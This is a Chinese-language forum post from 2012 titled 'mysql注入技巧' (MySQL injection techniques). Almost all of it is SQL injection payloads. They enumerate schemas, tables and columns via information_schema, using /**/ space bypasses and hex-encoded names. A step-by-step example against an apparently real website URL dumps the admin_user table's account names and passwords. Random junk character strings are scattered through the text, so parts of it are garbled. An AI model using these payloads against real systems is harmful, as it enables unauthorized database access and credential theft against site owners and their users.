标题: mysql注入技巧 [打印本页] 作者: admin 时间: 2012-9-13 16:29 标题: mysql注入技巧 查库 7 u2 a4 m: _/ K3 z$ F. h' C # J' }: t. h: k* z. m+ gid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/* 6 } j# f; L1 a4 f' @ + t" D, N& D, y; }7 b" z: X6 M查表 9 r) `' _. v# D. l F, q# n: o K( d7 O2 t6 Y
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1( ?, v& P5 U* K1 o
' a! \$ j3 ^$ o5 h9 u1 O# v
查段5 M6 `5 t' d) ?& G7 _$ x
1 E p/ L' @6 F, g. v5 p) gid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1. j8 B0 s% K4 ]+ p" Q+ g
2 s: `4 |& [5 h1 ]3 W3 @ + f+ O, D0 h" A& d+ O+ r+ z3 Pmysql5高级注入方法暴表. C7 s* g( g% u0 l) \: w
& G" z0 F2 m* {% J# e$ U1 j
例子如下:/ x" y. K5 H `/ a! t. d
& E5 l q# O$ o3 x7 L1.爆表 ' ^; R$ Z% m E6 y" Hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)& X+ d+ S* H H: D6 D' } ^: r" b
这样爆到第4个时出现了admin_user表。 ) @' U, m" r0 T* T8 J7 V3 _# ~& w: d2 r& d
2.暴字段 4 s1 Q" D$ \' a8 u+ W5 P7 Ghttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/** T: ]% Z0 u0 M+ B+ w$ @
! ^- I J. t: o: b! h& \" F
) x$ q4 K o3 h S/ a3.爆密码& l% H$ D5 R; Q, s* Q9 j http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* - ~5 Z* J; y- Y9 D! M
. ~; j; w4 a- Y8 u
3 n* @( j: W/ Z. B y